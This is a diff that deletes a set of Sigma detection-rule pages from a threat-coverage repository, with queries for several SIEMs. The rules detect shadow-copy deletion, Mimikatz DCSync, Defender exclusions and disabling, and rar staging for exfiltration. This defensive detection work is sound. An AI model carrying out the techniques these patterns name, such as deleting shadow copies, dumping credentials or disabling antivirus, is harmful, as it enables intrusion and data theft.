-(((ParentImage="*\\WINWORD.exe") (Image="*.tmp")) OR (Image="*\\wmic.exe" ParentImage="*\\Temp\\*" CommandLine="*shadowcopy delete") OR (CommandLine="*shadowcopy delete" CommandLine="*\\..\\..\\system32*")) | table ComputerName,User,Image
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((ParentImage IN ["*\\WINWORD.exe"] Image IN ["*.tmp"]) OR (Image="*\\wmic.exe" ParentImage="*\\Temp\\*" CommandLine="*shadowcopy delete") OR (CommandLine="*shadowcopy delete" CommandLine="*\\..\\..\\system32*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*.*\WINWORD\.exe))(?=.*(?:.*.*\.tmp)))|.*(?:.*(?=.*.*\wmic\.exe)(?=.*.*\Temp\\.*)(?=.*.*shadowcopy delete))|.*(?:.*(?=.*.*shadowcopy delete)(?=.*.*\\.\.\\.\.\system32.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_data_compressed_with_rar.md b/Atomic_Threat_Coverage/Detection_Rules/win_data_compressed_with_rar.md
deleted file mode 100644
index daceba6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_data_compressed_with_rar.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Data Compressed - rar.exe       |
-|:-------------------------|:------------------|
-| **Description**          | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0010: Exfiltration](https://attack.mitre.org/tactics/TA0010)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1002: Data Compressed](https://attack.mitre.org/techniques/T1002)</li><li>[T1560: Archive Collected Data](https://attack.mitre.org/techniques/T1560)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1560: Archive Collected Data](../Triggers/T1560.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>highly likely if rar is default archiver in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html](https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html)</li></ul>  |
-| **Author**               | Timur Zinniatullin, E.M. Anhaus, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Data Compressed - rar.exe
-id: 6f3e2987-db24-4c78-a860-b4f4095a7095
-status: experimental
-description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network
-author: Timur Zinniatullin, E.M. Anhaus, oscd.community
-date: 2019/10/21
-modified: 2019/11/04
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml
-    - https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\rar.exe'
-        CommandLine|contains: ' a '
-    condition: selection
-fields:
-    - Image
-    - CommandLine
-    - User
-    - LogonGuid
-    - Hashes
-    - ParentProcessGuid
-    - ParentCommandLine
-falsepositives:
-    - highly likely if rar is default archiver in the monitored environment
-level: low
-tags:
-    - attack.exfiltration
-    - attack.t1002
-    - attack.t1560
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\rar.exe" -and $_.message -match "CommandLine.*.* a .*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\rar.exe AND winlog.event_data.CommandLine.keyword:*\ a\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6f3e2987-db24-4c78-a860-b4f4095a7095 <<EOF
-{
-  "metadata": {
-    "title": "Data Compressed - rar.exe",
-    "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1002",
-      "attack.t1560"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\rar.exe AND winlog.event_data.CommandLine.keyword:*\\ a\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\rar.exe AND winlog.event_data.CommandLine.keyword:*\\ a\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Data Compressed - rar.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n            Image = {{_source.Image}}\n      CommandLine = {{_source.CommandLine}}\n             User = {{_source.User}}\n        LogonGuid = {{_source.LogonGuid}}\n           Hashes = {{_source.Hashes}}\nParentProcessGuid = {{_source.ParentProcessGuid}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\rar.exe AND CommandLine.keyword:* a *)
-```
-
-
-### splunk
-    
-```
-(Image="*\\rar.exe" CommandLine="* a *") | table Image,CommandLine,User,LogonGuid,Hashes,ParentProcessGuid,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\rar.exe" CommandLine="* a *")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\rar\.exe)(?=.*.* a .*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_dcsync.md b/Atomic_Threat_Coverage/Detection_Rules/win_dcsync.md
deleted file mode 100644
index 57161a0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_dcsync.md
+++ /dev/null
@@ -1,188 +0,0 @@
-| Title                    | Mimikatz DC Sync       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Mimikatz DC sync security events |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Valid DC Sync that is not covered by the filters; please report</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/gentilkiwi/status/1003236624925413376](https://twitter.com/gentilkiwi/status/1003236624925413376)</li><li>[https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2](https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2)</li></ul>  |
-| **Author**               | Benjamin Delpy, Florian Roth |
-| Other Tags           | <ul><li>attack.s0002</li><li>attack.t1003.006</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Mimikatz DC Sync
-id: 611eab06-a145-4dfa-a295-3ccc5c20f59a
-description: Detects Mimikatz DC sync security events
-status: experimental
-date: 2018/06/03
-modified: 2019/10/08
-author: Benjamin Delpy, Florian Roth
-references:
-    - https://twitter.com/gentilkiwi/status/1003236624925413376
-    - https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2
-tags:
-    - attack.credential_access
-    - attack.s0002
-    - attack.t1003
-    - attack.t1003.006
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4662
-        Properties:
-            - '*Replicating Directory Changes All*'
-            - '*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*'
-    filter1:
-        SubjectDomainName: 'Window Manager'
-    filter2:
-        SubjectUserName:
-            - 'NT AUTHORITY*'
-            - '*$'
-    condition: selection and not filter1 and not filter2
-falsepositives:
-    - Valid DC Sync that is not covered by the filters; please report
-level: high
-
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {((($_.ID -eq "4662" -and ($_.message -match "Properties.*.*Replicating Directory Changes All.*" -or $_.message -match "Properties.*.*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2.*")) -and  -not ($_.message -match "SubjectDomainName.*Window Manager")) -and  -not (($_.message -match "SubjectUserName.*NT AUTHORITY.*" -or $_.message -match "SubjectUserName.*.*$"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND ((winlog.event_id:"4662" AND winlog.event_data.Properties.keyword:(*Replicating\ Directory\ Changes\ All* OR *1131f6ad\-9c07\-11d1\-f79f\-00c04fc2dcd2*)) AND (NOT (SubjectDomainName:"Window\ Manager"))) AND (NOT (winlog.event_data.SubjectUserName.keyword:(NT\ AUTHORITY* OR *$))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/611eab06-a145-4dfa-a295-3ccc5c20f59a <<EOF
-{
-  "metadata": {
-    "title": "Mimikatz DC Sync",
-    "description": "Detects Mimikatz DC sync security events",
-    "tags": [
-      "attack.credential_access",
-      "attack.s0002",
-      "attack.t1003",
-      "attack.t1003.006"
-    ],
-    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:\"4662\" AND winlog.event_data.Properties.keyword:(*Replicating\\ Directory\\ Changes\\ All* OR *1131f6ad\\-9c07\\-11d1\\-f79f\\-00c04fc2dcd2*)) AND (NOT (SubjectDomainName:\"Window\\ Manager\"))) AND (NOT (winlog.event_data.SubjectUserName.keyword:(NT\\ AUTHORITY* OR *$))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND ((winlog.event_id:\"4662\" AND winlog.event_data.Properties.keyword:(*Replicating\\ Directory\\ Changes\\ All* OR *1131f6ad\\-9c07\\-11d1\\-f79f\\-00c04fc2dcd2*)) AND (NOT (SubjectDomainName:\"Window\\ Manager\"))) AND (NOT (winlog.event_data.SubjectUserName.keyword:(NT\\ AUTHORITY* OR *$))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Mimikatz DC Sync'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(((EventID:"4662" AND Properties.keyword:(*Replicating Directory Changes All* *1131f6ad\-9c07\-11d1\-f79f\-00c04fc2dcd2*)) AND (NOT (SubjectDomainName:"Window Manager"))) AND (NOT (SubjectUserName.keyword:(NT AUTHORITY* *$))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" ((EventCode="4662" (Properties="*Replicating Directory Changes All*" OR Properties="*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*")) NOT (SubjectDomainName="Window Manager")) NOT ((SubjectUserName="NT AUTHORITY*" OR SubjectUserName="*$")))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" ((event_id="4662" Properties IN ["*Replicating Directory Changes All*", "*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*"])  -(SubjectDomainName="Window Manager"))  -(SubjectUserName IN ["NT AUTHORITY*", "*$"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*(?=.*4662)(?=.*(?:.*.*Replicating Directory Changes All.*|.*.*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2.*))))(?=.*(?!.*(?:.*(?=.*Window Manager))))))(?=.*(?!.*(?:.*(?=.*(?:.*NT AUTHORITY.*|.*.*\$))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_defender_bypass.md b/Atomic_Threat_Coverage/Detection_Rules/win_defender_bypass.md
deleted file mode 100644
index 5898759..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_defender_bypass.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Windows Defender Exclusion Set       |
-|:-------------------------|:------------------|
-| **Description**          | Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1089: Disabling Security Tools](https://attack.mitre.org/techniques/T1089)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Intended inclusions by administrator</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/](https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/)</li></ul>  |
-| **Author**               | @BarryShooshooga |
-| Other Tags           | <ul><li>attack.t1562.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Windows Defender Exclusion Set
-id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d
-description: 'Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender'
-references:
-    - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
-tags:
-    - attack.defense_evasion
-    - attack.t1089
-    - attack.t1562.001
-author: "@BarryShooshooga"
-date: 2019/10/26
-logsource:
-    product: windows
-    service: security
-    definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User'
-detection:
-    selection:
-        EventID:
-            - 4657
-            - 4656
-            - 4660
-            - 4663
-        ObjectName|contains: '\Microsoft\Windows Defender\Exclusions\'
-    condition: selection
-falsepositives:
-    - Intended inclusions by administrator
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4657" -or $_.ID -eq "4656" -or $_.ID -eq "4660" -or $_.ID -eq "4663") -and $_.message -match "ObjectName.*.*\\Microsoft\\Windows Defender\\Exclusions\\.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:("4657" OR "4656" OR "4660" OR "4663") AND winlog.event_data.ObjectName.keyword:*\\Microsoft\\Windows\ Defender\\Exclusions\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d <<EOF
-{
-  "metadata": {
-    "title": "Windows Defender Exclusion Set",
-    "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1089",
-      "attack.t1562.001"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4657\" OR \"4656\" OR \"4660\" OR \"4663\") AND winlog.event_data.ObjectName.keyword:*\\\\Microsoft\\\\Windows\\ Defender\\\\Exclusions\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4657\" OR \"4656\" OR \"4660\" OR \"4663\") AND winlog.event_data.ObjectName.keyword:*\\\\Microsoft\\\\Windows\\ Defender\\\\Exclusions\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows Defender Exclusion Set'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("4657" "4656" "4660" "4663") AND ObjectName.keyword:*\\Microsoft\\Windows Defender\\Exclusions\\*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4657" OR EventCode="4656" OR EventCode="4660" OR EventCode="4663") ObjectName="*\\Microsoft\\Windows Defender\\Exclusions\\*")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["4657", "4656", "4660", "4663"] ObjectName="*\\Microsoft\\Windows Defender\\Exclusions\\*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*4657|.*4656|.*4660|.*4663))(?=.*.*\Microsoft\Windows Defender\Exclusions\\.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_defender_disabled.md b/Atomic_Threat_Coverage/Detection_Rules/win_defender_disabled.md
deleted file mode 100644
index fd07c8d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_defender_disabled.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Windows Defender Threat Detection Disabled       |
-|:-------------------------|:------------------|
-| **Description**          | Detects disabling Windows Defender threat protection |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1089: Disabling Security Tools](https://attack.mitre.org/techniques/T1089)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Administrator actions</li></ul>  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus)</li></ul>  |
-| **Author**               | Ján Trenčanský |
-| Other Tags           | <ul><li>attack.t1562.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Windows Defender Threat Detection Disabled
-id: fe34868f-6e0e-4882-81f6-c43aa8f15b62
-description: Detects disabling Windows Defender threat protection
-date: 2020/07/28
-author: Ján Trenčanský
-references:
-    - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus
-status: stable
-tags:
-    - attack.defense_evasion
-    - attack.t1089
-    - attack.t1562.001
-logsource:
-    product: windows
-    service: windefend
-detection:
-    selection:
-        EventID:
-            - 5001
-            - 5010
-            - 5012
-            - 5101
-    condition: selection
-falsepositives:
-    - Administrator actions
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Windows Defender/Operational | where {(($_.ID -eq "5001" -or $_.ID -eq "5010" -or $_.ID -eq "5012" -or $_.ID -eq "5101")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Windows\ Defender\/Operational" AND winlog.event_id:("5001" OR "5010" OR "5012" OR "5101"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fe34868f-6e0e-4882-81f6-c43aa8f15b62 <<EOF
-{
-  "metadata": {
-    "title": "Windows Defender Threat Detection Disabled",
-    "description": "Detects disabling Windows Defender threat protection",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1089",
-      "attack.t1562.001"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Windows\\ Defender\\/Operational\" AND winlog.event_id:(\"5001\" OR \"5010\" OR \"5012\" OR \"5101\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Windows\\ Defender\\/Operational\" AND winlog.event_id:(\"5001\" OR \"5010\" OR \"5012\" OR \"5101\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows Defender Threat Detection Disabled'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:("5001" "5010" "5012" "5101")
-```
-
-
-### splunk
-    
-```
-(EventCode="5001" OR EventCode="5010" OR EventCode="5012" OR EventCode="5101")
-```
-
-
-### logpoint
-    
-```
-event_id IN ["5001", "5010", "5012", "5101"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*5001|.*5010|.*5012|.*5101)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_defender_threat.md b/Atomic_Threat_Coverage/Detection_Rules/win_defender_threat.md
deleted file mode 100644
index cb69fe5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_defender_threat.md
+++ /dev/null
@@ -1,170 +0,0 @@
-| Title                    | Windows Defender Threat Detected       |
-|:-------------------------|:------------------|
-| **Description**          | Detects all actions taken by Windows Defender malware detection engines |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unlikely</li></ul>  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus)</li></ul>  |
-| **Author**               | Ján Trenčanský |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Windows Defender Threat Detected
-id: 57b649ef-ff42-4fb0-8bf6-62da243a1708
-description: Detects all actions taken by Windows Defender malware detection engines
-date: 2020/07/28
-author: Ján Trenčanský
-references:
-    - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus
-status: stable
-logsource:
-    product: windows
-    service: windefend
-detection:
-    selection:
-        EventID:
-            - 1006
-            - 1116
-            - 1015
-            - 1117
-    condition: selection
-falsepositives:
-    - unlikely
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Windows Defender/Operational | where {(($_.ID -eq "1006" -or $_.ID -eq "1116" -or $_.ID -eq "1015" -or $_.ID -eq "1117")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Windows\ Defender\/Operational" AND winlog.event_id:("1006" OR "1116" OR "1015" OR "1117"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/57b649ef-ff42-4fb0-8bf6-62da243a1708 <<EOF
-{
-  "metadata": {
-    "title": "Windows Defender Threat Detected",
-    "description": "Detects all actions taken by Windows Defender malware detection engines",
-    "tags": "",
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Windows\\ Defender\\/Operational\" AND winlog.event_id:(\"1006\" OR \"1116\" OR \"1015\" OR \"1117\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Windows\\ Defender\\/Operational\" AND winlog.event_id:(\"1006\" OR \"1116\" OR \"1015\" OR \"1117\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows Defender Threat Detected'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:("1006" "1116" "1015" "1117")
-```
-
-
-### splunk
-    
-```
-(EventCode="1006" OR EventCode="1116" OR EventCode="1015" OR EventCode="1117")
-```
-
-
-### logpoint
-    
-```
-event_id IN ["1006", "1116", "1015", "1117"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*1006|.*1116|.*1015|.*1117)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_disable_event_logging.md b/Atomic_Threat_Coverage/Detection_Rules/win_disable_event_logging.md
deleted file mode 100644
index 738348f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_disable_event_logging.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Disabling Windows Event Auditing       |
-|:-------------------------|:------------------|
-| **Description**          | Detects scenarios where system auditing (ie: windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
